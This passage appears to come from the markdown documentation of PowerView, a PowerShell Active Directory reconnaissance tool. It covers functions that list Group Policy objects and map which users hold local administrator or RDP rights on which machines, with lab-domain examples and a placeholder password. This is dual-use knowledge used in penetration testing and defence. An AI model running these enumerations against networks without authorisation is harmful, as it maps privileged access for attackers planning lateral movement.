ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.ForeignUser\r\n\r\nCustom PSObject with translated user property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGPO.md",
    "content": "# Get-DomainGPO\r\n\r\n## SYNOPSIS\r\nReturn all GPOs or specific GPO objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n### None (Default)\r\n```\r\nGet-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]\r\n [-Raw]\r\n```\r\n\r\n### ComputerIdentity\r\n```\r\nGet-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]\r\n [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]\r\n [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n### UserIdentity\r\n```\r\nGet-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]\r\n [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]\r\n [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties samaccountname,usnchanged,...\".\r\nBy default, all GPO objects for\r\nthe current domain are returned.\r\nTo enumerate all GPOs that are applied to\r\na particular machine, use -ComputerName X.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainGPO -Domain testlab.local\r\n```\r\n\r\nReturn all GPOs for the testlab.local domain\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainGPO -ComputerName windows1.testlab.local\r\n```\r\n\r\nReturns all GPOs applied windows1.testlab.local\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n\"{F260B76D-55C8-46C5-BEF1-9016DD98E272}\",\"Test GPO\" | Get-DomainGPO\r\n```\r\n\r\nReturn the GPOs with the name of \"{F260B76D-55C8-46C5-BEF1-9016DD98E272}\" and the display\r\nname of \"Test GPO\"\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon\r\n```\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainGPO -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA display name (e.g.\r\n'Test GPO'), DistinguishedName (e.g.\r\n'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),\r\nGUID (e.g.\r\n'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.\r\n'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerIdentity\r\nReturn all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: ComputerIdentity\r\nAliases: ComputerName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserIdentity\r\nReturn all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: UserIdentity\r\nAliases: UserName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.GPO\r\n\r\nCustom PSObject with translated GPO property fields.\r\n\r\nPowerView.GPO.Raw\r\n\r\nThe raw DirectoryServices.SearchResult object, if -Raw is enabled.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md",
    "content": "# Get-DomainGPOComputerLocalGroupMapping\r\n\r\n## SYNOPSIS\r\nTakes a computer (or GPO) object and determines what users/groups are in the specified\r\nlocal group for the machine through GPO correlation.\r\n\r\nAuthor: @harmj0y  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup\r\n\r\n## SYNTAX\r\n\r\n### ComputerIdentity (Default)\r\n```\r\nGet-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n### OUIdentity\r\n```\r\nGet-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups\r\nare in the specified local group for a target machine through GPO correlation.\r\n\r\nIf a -ComputerIdentity is specified, retrieve the complete computer object, attempt to\r\ndetermine the OU the computer is a part of.\r\nThen resolve the computer's site name with\r\nGet-NetComputerSiteName and retrieve all sites object Get-DomainSite.\r\nFor those results, attempt to\r\nenumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.\r\nFor\r\neach resulting GPO group, resolve the resulting user/group name to a full AD object and\r\nreturn the results.\r\nThis will return the domain objects that are members of the specified\r\n-LocalGroup for the given computer.\r\n\r\nOtherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and\r\nlocalgroup specifications.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local\r\n```\r\n\r\nFinds users who have local admin rights over WINDOWS3 through GPO correlation.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP\r\n```\r\n\r\nFinds users who have RDP rights over WINDOWS4 through GPO correlation.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerIdentity\r\nA SamAccountName (e.g.\r\nWINDOWS10$), DistinguishedName (e.g.\r\nCN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.\r\n4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\r\nor a dns host name (e.g.\r\nwindows10.testlab.local) for the computer to identity GPO local group mappings for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: ComputerIdentity\r\nAliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OUIdentity\r\nAn OU name (e.g.\r\nTestOU), DistinguishedName (e.g.\r\nOU=TestOU,DC=testlab,DC=local), or\r\nGUID (e.g.\r\n8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: OUIdentity\r\nAliases: OU\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LocalGroup\r\nThe local group to check access against.\r\nCan be \"Administrators\" (S-1-5-32-544), \"RDP/Remote Desktop Users\" (S-1-5-32-555),\r\nor a custom local SID.\r\nDefaults to local 'Administrators'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to enumerate GPOs for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\n{{Fill SearchBase Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.GGPOComputerLocalGroupMember\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGPOLocalGroup.md",
    "content": "# Get-DomainGPOLocalGroup\r\n\r\n## SYNOPSIS\r\nReturns all GPOs in a domain that modify local group memberships through 'Restricted Groups'\r\nor Group Policy preferences.\r\nAlso return their user membership mappings, if they exist.\r\n\r\nAuthor: @harmj0y  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]\r\n [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst enumerates all GPOs in the current/target domain using Get-DomainGPO with passed\r\narguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or\r\ngroup membership is set through Group Policy Preferences groups.xml files.\r\nFor any\r\nGptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'\r\nsection data is processed if present.\r\nAny found Groups.xml files are parsed with\r\nGet-GroupsXML and those memberships are returned as well.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainGPOLocalGroup\r\n```\r\n\r\nReturns all local groups set by GPO along with their members and memberof.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainGPOLocalGroup -ResolveMembersToSIDs\r\n```\r\n\r\nReturns all local groups set by GPO along with their members and memberof,\r\nand resolve any members to their domain SIDs.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup\r\n```\r\n\r\nReturn any GPO-set groups for the GPO with the given name/GUID.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-DomainGPOLocalGroup 'Desktops'\r\n```\r\n\r\nReturn any GPO-set groups for the GPO with the given display name.\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainGPOLocalGroup -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA display name (e.g.\r\n'Test GPO'), DistinguishedName (e.g.\r\n'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),\r\nGUID (e.g.\r\n'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.\r\n'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResolveMembersToSIDs\r\nSwitch.\r\nIndicates that any member names should be resolved to their domain SIDs.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.GPOGroup\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGPOUserLocalGroupMapping.md",
    "content": "# Get-DomainGPOUserLocalGroupMapping\r\n\r\n## SYNOPSIS\r\nEnumerates the machines where a specific domain user/group is a member of a specific\r\nlocal group, all through GPO correlation.\r\nIf no user/group is specified, all\r\ndiscoverable mappings are returned.\r\n\r\nAuthor: @harmj0y  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a user/group name and optional domain, and determines the computers in the domain\r\nthe user/group has local admin (or RDP) rights to.\r\n\r\nIt does this by:\r\n    1. \r\nresolving the user/group to its proper SID\r\n    2. \r\nenumerating all groups the user/group is a current part of\r\n        and extracting all target SIDs to build a target SID list\r\n    3. \r\npulling all GPOs that set 'Restricted Groups' or Groups.xml by calling\r\n        Get-DomainGPOLocalGroup\r\n    4. \r\nmatching the target SID list to the queried GPO SID list\r\n        to enumerate all GPO the user is effectively applied with\r\n    5. \r\nenumerating all OUs and sites and applicable GPO GUIs are\r\n        applied to through gplink enumerating\r\n    6. \r\nquerying for all computers under the given OUs or sites\r\n\r\nIf no user/group is specified, all user/group -\\> machine mappings discovered through\r\nGPO relationships are returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-GPOLocation\r\n```\r\n\r\nFind all user/group -\\> machine relationships where the user/group is a member\r\nof the local administrators group on target machines.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-GPOLocation -UserName dfm -Domain dev.testlab.local\r\n```\r\n\r\nFind all computers that dfm user has local administrator rights to in\r\nthe dev.testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nFind-GPOLocation -UserName dfm -Domain dev.testlab.local\r\n```\r\n\r\nFind all computers that dfm user has local administrator rights to in\r\nthe dev.testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', 